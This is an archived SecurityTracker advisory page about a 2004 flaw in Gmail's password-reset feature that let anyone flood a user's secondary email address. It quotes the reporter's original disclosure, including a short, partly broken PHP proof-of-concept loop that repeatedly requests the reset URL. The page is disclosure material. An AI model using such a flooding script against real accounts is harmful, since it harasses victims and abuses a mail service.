Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   


Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker

Category:   Application (E-mail Server)  >   GMail Vendors:   Google
Gmail 'forgot your password?' Feature Lets Remote Users Flood a User's Secondary E-mail Account
SecurityTracker Alert ID:  1012749
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 2 2005
Impact:   Host/resource access via network
Exploit Included:  Yes  

Description:   Joxean Koret reported a vulnerability in the Gmail service. A remote user can cause a large amount of e-mail to be sent to the target user's secondary address.

The Gmail service 'forgot your password?' feature allows a remote user to load a certain URL to cause the service to send a validation e-mail to the specified user's secondary e-mail address. There is no limit to the number of messages sent over a period of time, so a remote user can flood the target user's secondary e-mail address.

The vendor was notified on September 26, 2004.

Impact:   A remote user can cause a large amount of e-mail to be sent to the target user's secondary e-mail account.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Access control error, State error

Message History:   None.

 Source Message Contents

Date:  Sat, 01 Jan 2005 20:15:14 +0000
Subject:  GMail E-Mail Bomber

              GMail E-Mail Bomber

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004 
Location: Basque Country


Affected software description:

GMail - Gmail is an experiment in a new kind of webmail, built on the
that you should never have to delete mail and you should always be able
find the message you want

Web :



A. E-Mail Bomber

The problem is the following : If any gmail user forgots the password
can answer a question or send to her/sher secondary e-mail addresses a
reset confirmation e-mail. Well, with GMail we can flood the secondary
box of GMail users.

I wrote a very basic Proof Of Concept in PHP : 

* GMail bomber Proof Of Concept
* Date time : Sun. Sep-26-2004
* Author : Jose Antonio Coret
* E-Mail : 

$gmail_account     = "";
$google_cgi        =
$google_cgi_params =
$emails_to_send    = 15;
$bomber_url        = "$google_cgi$google_cgi_params";

        echo("GMail bomber\n");
        echo("P.O.C. provided by Jose Antonio Coret (Joxean Koret)\n
        echo("Starting flood against $gmail_account ... \n\n");

        for ($i = 0;$i<$emails_to_send;$i++)
                echo("Sending e-mail number " . ($i + 1) . " ... ");
                $fd = fopen($bomber_url, "r");


The fix:

The vendor was contacted on Sun, 26 Sep 2004 21:11:55 but the problem
continues unfixed at Sun, 26 Dec 2004.


The information in this advisory and any of its demonstrations is
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this



	Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

Copyright 2017, LLC